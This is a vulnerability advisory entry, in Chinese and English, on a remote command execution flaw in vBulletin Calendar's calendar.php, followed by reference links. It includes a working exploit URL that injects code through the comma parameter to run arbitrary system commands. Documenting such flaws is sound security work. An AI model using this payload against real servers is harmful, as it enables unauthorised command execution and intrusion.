https://www.exploit-db.com/exploits/21874
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200212-127

vBulletinCalendar是一款基于WEB的日历程序。vBulletinCalendar对用户输入缺少正确过滤，远程攻击者可以利用这个漏洞以WEB权限在系统上执行任意命令。vBulletinCalendar中的calendar.php脚本对用户提交给comma参数的值缺少过滤，攻击者提交特殊字符并追加任意系统命令，可能以WEB进程的权限(一般是nobody)在系统上执行任意命令。

source: http://www.securityfocus.com/bid/5820/info

A remote command execution vulnerability has been reported for vBulletin. The vulnerability is due to vBulletin failing to properly sanitize user-supplied input from URI parameters. 

An attacker can exploit this vulnerability to execute malicious commands on the vulnerable system.

http://www.example.com/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60<command>%20%60;die();echo%22

where <command> signifies a command to be executed on the system.

来源:SECTRACK
名称:1005284
链接:http://securitytracker.com/id?1005284
来源:XF
名称:vbulletin-calendar-command-execution(10176)
链接:http://xforce.iss.net/xforce/xfdb/10176
来源:BID
名称:5820
链接:http://www.securityfocus.com/bid/5820
来源:www.securiteam.com
链接:http://www.securiteam.com/exploits/5QP0P158AC.html
来源：NSFOCUS
名称：3579
链接：http://www.nsfocus.net/vulndb/3579